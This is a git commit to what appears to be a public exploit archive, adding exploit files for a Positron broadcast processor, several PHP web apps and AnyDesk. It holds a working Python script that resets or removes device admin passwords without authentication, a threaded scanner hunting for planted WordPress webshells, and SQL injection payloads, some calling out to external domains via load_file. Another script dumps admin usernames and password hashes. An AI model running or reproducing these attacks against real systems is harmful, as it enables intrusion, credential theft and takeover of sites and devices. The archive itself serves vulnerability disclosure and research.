DB: 2024-04-09

8 changes to exploits/shellcodes/ghdb Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass Best Student Result Management System v1.0 - Multiple SQLi Daily Expense Manager 1.0 - 'term' SQLi Human Resource Management System v1.0 - Multiple SQLi Open Source Medicine Ordering System v1.0 - SQLi Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload AnyDesk 7.0.15 - Unquoted Service Path
2024-04-09 00:16:23 +00:00 · 2024-04-09 00:16:23 +00:00 · 034fafa3fd
commit 034fafa3fd
parent a06b0db78d
8 changed files with 513 additions and 0 deletions
--- a/exploits/hardware/remote/51970.py
+++ b/exploits/hardware/remote/51970.py
@ -0,0 +1,108 @@
 # Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
 # Author: LiquidWorm
 # Vendor: Positron srl
 # Product web page: https://www.positron.it
 #                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
 # Affected version: 1.20
 #                   TRA7K5_REV107
 #                   TRA7K5_REV106
 #                   TRA7K5_REV104
 #                   TRA7K5_REV102
 #
 # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
 # guarantee an excellent quality-price ratio in compliance with current regulations and
 # intended for individual broadcasters or radio networks. All models in the TRA7000 series
 # are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
 # and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
 # MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
 # for both analogue and digital audio inputs, change-over emergency switching between any
 # input with adjustable thresholds and intervention times, both in the switching phase on
 # the secondary source and in the return phase to the primary source. Ethernet connection
 # with Web-Server (optional) for total control and management of the device. Advanced BYPASS
 # system between MPX input and outputs, active on operating and power supply anomalies and
 # can also be activated remotely.
 #
 # Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
 # bypass through a direct and unauthorized access to the password management functionality.
 # The vulnerability allows attackers to bypass Digest authentication by manipulating the
 # password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
 # value or remove it entirely. This grants unauthorized access to protected areas (/user,
 # /operator, /admin) of the application without requiring valid credentials, compromising
 # the device's system security.
 #
 # Tested on: Positron Web Server
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2024-5813
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
 #
 #
 # 22.03.2024
 #
 #
 import requests,sys
 print("""
 ______________________________________
 ┏┳┓•      ┏┓            ┓  ┏┓    ┓  •
 ┃ ┓┏┓┓┏  ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫  ┣ ┓┏┏┓┃┏┓┓╋
 ┻ ┗┛┗┗┫  ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻  ┗┛┛┗┣┛┗┗┛┗┗
       ┛                       ┛
                 for
   Positron Digital Signal Processor
             ZSL-2024-5813
 ______________________________________
 """)
 if len(sys.argv) != 4:
    print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
    sys.exit(1)
 ip = sys.argv[1]
 ut = sys.argv[2]
 wa = sys.argv[3]
 valid_ut = ['user', 'oper', 'admin']
 if ut.lower() not in valid_ut:
    print("Invalid user type! Use 'user', 'oper', or 'admin'.")
    sys.exit(1)
 url = f'http://{ip}/_Passwd.html'
 did = f'http://{ip}/_Device.html'
 try:
    r = requests.get(did)
    if r.status_code == 200 and 'TRA7K5' in r.text:
        print("Vulnerable processor found!")
    else:
        print("Not Vulnerable or not applicable. Exploit exiting.")
        sys.exit(1)
 except requests.exceptions.RequestException as e:
    print(f"Error checking device: {e}")
    sys.exit(1)
 headers = {
    'Content-Type'   : 'application/x-www-form-urlencoded',
    'Accept-Language': 'mk-MK,en;q=0.6',
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent'     : 'R-Marina/11.9',
    'Accept'         : '*/*'
 }
 payload = {}
 if wa.lower() == 'erase':
    payload[f'PSW_{ut.capitalize()}'] = 'NONE'
 else:
    payload_key = f'PSW_{ut.capitalize()}'
    payload[payload_key] = wa
    #print(payload)
 r = requests.post(url, headers=headers, data=payload)
 print(r.status_code)
 print(r.text)
--- a/exploits/php/webapps/51969.py
+++ b/exploits/php/webapps/51969.py
@ -0,0 +1,141 @@
 # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
 # Date: 2024-04-01
 # Author: Milad Karimi (Ex3ptionaL)
 # Category : webapps
 # Tested on: windows 10 , firefox
 import sys
 import os.path
 import requests
 import re
 import urllib3
 from requests.exceptions import SSLError
 from multiprocessing.dummy import Pool as ThreadPool
 from colorama import Fore, init
 init(autoreset=True)
 error_color = Fore.RED
 info_color = Fore.CYAN
 success_color = Fore.GREEN
 highlight_color = Fore.MAGENTA
 requests.urllib3.disable_warnings()
 headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
 wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
 Mobile Safari/537.36',
    'Accept':
 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
 }
 def URLdomain(url):
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url
 def check_security(url):
    fg = success_color
    fr = error_color
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url +
 '/wp-content/themes/travelscape/json.php', headers=headers,
 allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('MSQ_403.txt', 'a').write(url +
 '/wp-content/themes/travelscape/json.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
 '/wp-content/themes/aahana/json.php', headers=headers,
 allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url +
 '/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        check = requests.get(url + '/wp-content/themes/travel/issue.php',
 headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url +
 '/wp-content/themes/travel/issue.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/about.php', headers=headers,
 allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/about.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url +
 '/wp-content/themes/digital-download/new.php', headers=headers,
 allow_redirects=True, timeout=15)
        if '#0x2525' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('digital-download.txt', 'a').write(url +
 '/wp-content/themes/digital-download/new.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers,
 allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php',
 headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
 '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
 allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url +
 '/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        print(f' -| {url} --> {fr}[Failed] due to: {e}')
 def main():
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file
 containing URLs: ")
        if not os.path.isfile(url_file_path):
            print(f"{error_color}[ERROR] The specified file path is
 invalid.")
            sys.exit(1)
    try:
        urls_to_check = [line.strip() for line in open(url_file_path, 'r',
 encoding='utf-8').readlines()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the
 file: {e}")
        sys.exit(1)
    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully.
 Results are saved in corresponding files.")
 if __name__ == "__main__":
    main()
--- a/exploits/php/webapps/51971.txt
+++ b/exploits/php/webapps/51971.txt
@ -0,0 +1,52 @@
 ## Title: Human Resource Management System v1.0 - Multiple SQLi
 ## Author: nu11secur1ty
 ## Date: 04/02/2024
 ## Vendor: https://github.com/oretnom23
 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
 ## Reference: https://portswigger.net/web-security/sql-injection
 ## Description:
 The cityedit parameter appears to be vulnerable to SQL injection
 attacks. The payload '+(select
 load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'
 was submitted in the cityedit parameter. This payload injects a SQL
 sub-query that calls MySQL's load_file function with a UNC file path
 that references a URL on an external domain. The application
 interacted with that domain, indicating that the injected SQL query
 was executed.
 The attacker can get all information from the system by using this
 vulnerability!
 STATUS: HIGH- Vulnerability
 [+]Payload:
 ```mysql
 ---
 Parameter: cityedit (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
 or GROUP BY clause
    Payload: cityedit=22'+(select
 load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
 RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select
 load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''
 ELSE 0x28 END)) AND 'GMzs'='GMzs
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
 GROUP BY clause (FLOOR)
    Payload: cityedit=22'+(select
 load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
 OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT
 (ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM
 INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK
    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: cityedit=22'+(select
 load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
 AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
 INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR
 1) AND 'Jtnd'='Jtnd
 ---
 ```
--- a/exploits/php/webapps/51972.txt
+++ b/exploits/php/webapps/51972.txt
@ -0,0 +1,44 @@
 ## Title: Best Student Result Management System v1.0 - Multiple SQLi
 ## Author: nu11secur1ty
 ## Date: 04/08/2024
 ## Vendor: https://www.mayurik.com/
 ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
 ## Reference: https://portswigger.net/web-security/sql-injection
 ## Description:
 The nid parameter appears to be vulnerable to SQL injection attacks.
 The payload '+(select
 load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'
 was submitted in the nid parameter. This payload injects a SQL
 sub-query that calls MySQL's load_file function with a UNC file path
 that references a URL on an external domain. The application
 interacted with that domain, indicating that the injected SQL query
 was executed.
 The attacker can get all information from the system by using this
 vulnerability!
 STATUS: HIGH- Vulnerability
 [+]Payload:
 ```mysql
 ---
 Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM
 (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT
 NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
 ---
 ```
--- a/exploits/php/webapps/51973.txt
+++ b/exploits/php/webapps/51973.txt
@ -0,0 +1,37 @@
 # Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
 # Date: February 25th, 2024
 # Exploit Author: Stefan Hesselman
 # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
 # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
 # Version: 1.0
 # Tested on: Kali Linux
 # CVE: N/A
 # CWE: CWE-89, CWE-74
 ## Description
 Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker
 can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.
 ## Vulnerable endpoint:
 http://example.com/Daily-Expense-Manager/readxp.php?term=asd
 ## Vulnerable HTTP parameter:
 term (GET)
 ## Exploit proof-of-concept:
 http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-
 ## Vulnerable PHP code:
 File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
 <?php
 [...]
 //get search term
 $searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
 //get matched data from skills table
 $query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
 while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
 }
 //return json data
 echo json_encode($data);
 ?>
--- a/exploits/php/webapps/51974.py
+++ b/exploits/php/webapps/51974.py
@ -0,0 +1,84 @@
 # Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi
 # Author : Onur Karasalihoğlu
 # Date : 27/02/2024
 # Sample Usage
 % python3 omos_sqli_exploit.py https://target.com
 Available Databases:
 1. information_schema
 2. omosdb
 Please select a database to use (enter number): 2
 You selected: omosdb
 Extracted Admin Users Data:
 1 | Adminstrator | Admin |  | 0192023a7bbd73250516f069df18b500 | admin
 2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith
 '''
 import requests
 import re
 import sys
 def fetch_database_names(domain):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests
        # data extraction
        pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            databases = extracted_data.group(1).split(',')
            databases = [db.replace('"', '') for db in databases]
            print("Available Databases:")
            for i, db in enumerate(databases, start=1):
                print(f"{i}. {db}")
            # users should select omos database
            choice = int(input("Please select a database to use (enter number): "))
            if 0 < choice <= len(databases):
                selected_db = databases[choice - 1]
                print(f"You selected: {selected_db}")
                fetch_data(domain, selected_db)
            else:
                print("Invalid selection.")
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")
 def fetch_data(domain, database_name):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests
        # data extraction
        pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            print("Extracted Admin Users Data:")
            data = extracted_data.group(1)
            rows = data.split('","')
            for row in rows:
                clean_row = row.replace('"', '')
                user_details = clean_row.split(',')
                print(" | ".join(user_details))
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")
 def main():
    if len(sys.argv) != 2:
        print("Usage: python3 omos_sqli_exploit.py <domain>")
        sys.exit(1)
    fetch_database_names(sys.argv[1])
 if __name__ == "__main__":
    main()
--- a/exploits/windows/local/51968.txt
+++ b/exploits/windows/local/51968.txt
@ -0,0 +1,40 @@
 # Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path
 # Date: 2024-04-01
 # Exploit Author: Milad Karimi (Ex3ptionaL)
 # Contact: miladgrayhat@gmail.com
 # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
 # Vendor Homepage: http://anydesk.com
 # Software Link: http://anydesk.com/download
 # Version: Software Version 7.0.15
 # Tested on: Windows 10 Pro x64
 1. Description:
 The Anydesk installs as a service with an unquoted service path running
 with SYSTEM privileges.
 This could potentially allow an authorized but non-privileged local
 user to execute arbitrary code with elevated privileges on the system.
 2. Proof
 C:\>sc qc anydesk
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: anydesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
 --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AnyDesk Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
 C:\>systeminfo
 OS Name:  Microsoft Windows 10 Pro
 OS Version: 10.0.19045 N/A Build 19045
 OS Manufacturer: Microsoft Corporation
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3865,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2016-11-08,0,,,,,,
 24494,exploits/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",remote,hardware,23,2013-02-14,2016-08-03,1,,"Metasploit Framework (MSF)",,,,http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf
 35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",remote,hardware,,2011-07-05,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/48560/info
 51970,exploits/hardware/remote/51970.py,"Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass",2024-04-08,LiquidWorm,remote,hardware,,2024-04-08,2024-04-08,0,,,,,,
 51158,exploits/hardware/remote/51158.txt,"ProLink PRS1841 PLDT Home fiber - Default Password",2023-03-31,"Lawrence Amer",remote,hardware,,2023-03-31,2023-04-03,0,,,,,,
 32469,exploits/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",remote,hardware,,2008-10-09,2014-03-24,1,CVE-2008-5869;OSVDB-51260,,,,,https://www.securityfocus.com/bid/31666/info
 36503,exploits/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,9993,2015-03-26,2015-03-26,0,CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,"Metasploit Framework (MSF)",,,,https://github.com/d3vpp/metasploit-modules
@ -14821,6 +14822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
 51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
 51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-06-04,1,,,,,,
 51972,exploits/php/webapps/51972.txt,"Best Student Result Management System v1.0 - Multiple SQLi",2024-04-08,nu11secur1ty,webapps,php,,2024-04-08,2024-04-08,0,,,,,,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
 10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
 10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@ -16733,6 +16735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5916,exploits/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Remote File Inclusion",2008-06-23,CraCkEr,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-56271;CVE-2008-6636;CVE-2008-6635;OSVDB-46489,,,,,
 4097,exploits/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,webapps,php,,2007-06-23,,1,OSVDB-36302;CVE-2007-3431,,,,,
 41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php,,2017-03-07,2017-03-07,0,,,,,,
 51973,exploits/php/webapps/51973.txt,"Daily Expense Manager 1.0 - 'term' SQLi",2024-04-08,"Stefan Hesselman",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
 47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80,2019-08-08,2019-08-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comexpense.zip,
 48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,,2020-08-07,2020-08-07,0,,,,,,
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,,2020-08-04,2020-08-04,0,,,,,,
@ -19773,6 +19776,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
 51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
 51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 51971,exploits/php/webapps/51971.txt,"Human Resource Management System v1.0 - Multiple SQLi",2024-04-08,nu11secur1ty,webapps,php,,2024-04-08,2024-04-08,0,,,,,,
 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
@ -25103,6 +25107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 14459,exploits/php/webapps/14459.txt,"Open Realty 2.x/3.x - Persistent Cross-Site Scripting",2010-07-24,K053,webapps,php,,2010-07-24,2010-07-24,1,,,,,,
 25650,exploits/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,webapps,php,,2005-05-11,2013-05-23,1,CVE-2005-1587;OSVDB-16330,,,,,https://www.securityfocus.com/bid/13599/info
 11496,exploits/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",webapps,php,,2010-02-17,,1,,,,,,
 51974,exploits/php/webapps/51974.py,"Open Source Medicine Ordering System v1.0 - SQLi",2024-04-08,"Onur Karasalihoğlu",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
 39868,exploits/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",webapps,php,80,2016-05-30,2016-05-30,1,,,,,,
 41047,exploits/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
 45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,,2018-10-25,2018-10-25,0,,,,,,
@ -34083,6 +34088,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29332,exploits/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",webapps,php,,2013-11-02,2013-11-02,0,OSVDB-101020,,,,,
 38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php,,2013-11-01,2015-11-27,1,,,,,,https://www.securityfocus.com/bid/63523/info
 38077,exploits/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' SQL Injection",2012-11-29,"Ashiyane Digital Security Team",webapps,php,,2012-11-29,2015-09-03,1,OSVDB-88293,,,,,https://www.securityfocus.com/bid/56745/info
 51969,exploits/php/webapps/51969.py,"Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload",2024-04-08,"Milad karimi",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
 36195,exploits/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php,,2011-09-24,2015-02-27,1,CVE-2011-3859;OSVDB-75954,,,,,https://www.securityfocus.com/bid/49896/info
 39895,exploits/php/webapps/39895.php,"WordPress Theme Uncode 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,webapps,php,80,2016-06-06,2016-06-06,0,,,,,,
 39296,exploits/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php,,2014-09-08,2016-01-23,1,,,,,,https://www.securityfocus.com/bid/69670/info
@ -39638,6 +39644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,,2020-03-13,2020-03-13,0,,,,,,
 40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows,,2016-09-22,2016-09-22,0,,,,,http://www.exploit-db.comAnyDesk.exe,
 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,,2020-01-07,2020-01-07,0,,,,,,
 51968,exploits/windows/local/51968.txt,"AnyDesk 7.0.15 - Unquoted Service Path",2024-04-08,"Milad karimi",local,windows,,2024-04-08,2024-04-08,0,,,,,,
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,,2021-02-09,2021-02-09,0,,,,,,
